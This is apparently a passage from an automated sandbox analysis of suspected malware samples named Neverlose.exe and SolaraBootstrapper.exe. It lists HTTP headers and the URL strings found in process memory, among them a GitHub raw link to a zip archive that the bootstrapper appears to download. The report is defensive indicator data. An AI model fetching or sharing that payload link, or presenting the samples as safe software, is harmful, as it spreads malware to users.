Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Content-Length: 14 | Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox | Strict-Transport-Security: max-age=31536000 | X-Content-Type-Options: nosniff | X-Frame-Options: deny | X-XSS-Protection: 1; mode=block | Content-Type: text/plain; charset=utf-8 | X-GitHub-Request-Id: FE3C:A4EB4:914EDB:A2C9D5:66CA3A99 | Accept-Ranges: bytes | Date: Sat, 24 Aug 2024 19:55:05 GMT | Via: 1.1 varnish | X-Served-By: cache-ewr-kewr1740072-EWR | X-Cache: MISS | X-Cache-Hits: 0 | X-Timer: S1724529306.809325,VS0,VE8 | Vary: Authorization,Accept-Encoding,Origin | Access-Control-Allow-Origin: * | Cross-Origin-Resource-Policy: cross-origin | X-Fastly-Request-ID: bdaf9571f5649794f8b717df41ba184de9a7a2f1 | Expires: Sat, 24 Aug 2024 20:00:05 GMT | Source-Age: 0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: GitHub.com | Date: Sat, 24 Aug 2024 19:55:04 GMT | Content-Type: text/html; charset=utf-8 | Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With | Cache-Control: no-cache | Strict-Transport-Security: max-age=31536000; includeSubdomains; preload | X-Frame-Options: deny | X-Content-Type-Options: nosniff | X-XSS-Protection: 0 | Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: powershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000013.00000002.2532316292.00000204B1F43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.comd
Source: powershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 0000000D.00000002.2060250567.0000024348C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic)
Source: powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2914277285.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                  Source: powershell.exe, 00000013.00000002.2532847768.00000204B2010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/collections
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/customer-stories
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/advanced-security
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/startups
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/actions
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/code-review
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/codespaces
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/copilot
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/discussions
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/issues
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/packages
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/security
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.drString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/readme
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/ci-cd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devops
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devsecops
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/financial-services
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/healthcare
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/manufacturing
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/te
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/team
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/topics
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/trending
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-11260080
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-3b4c83250375.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js
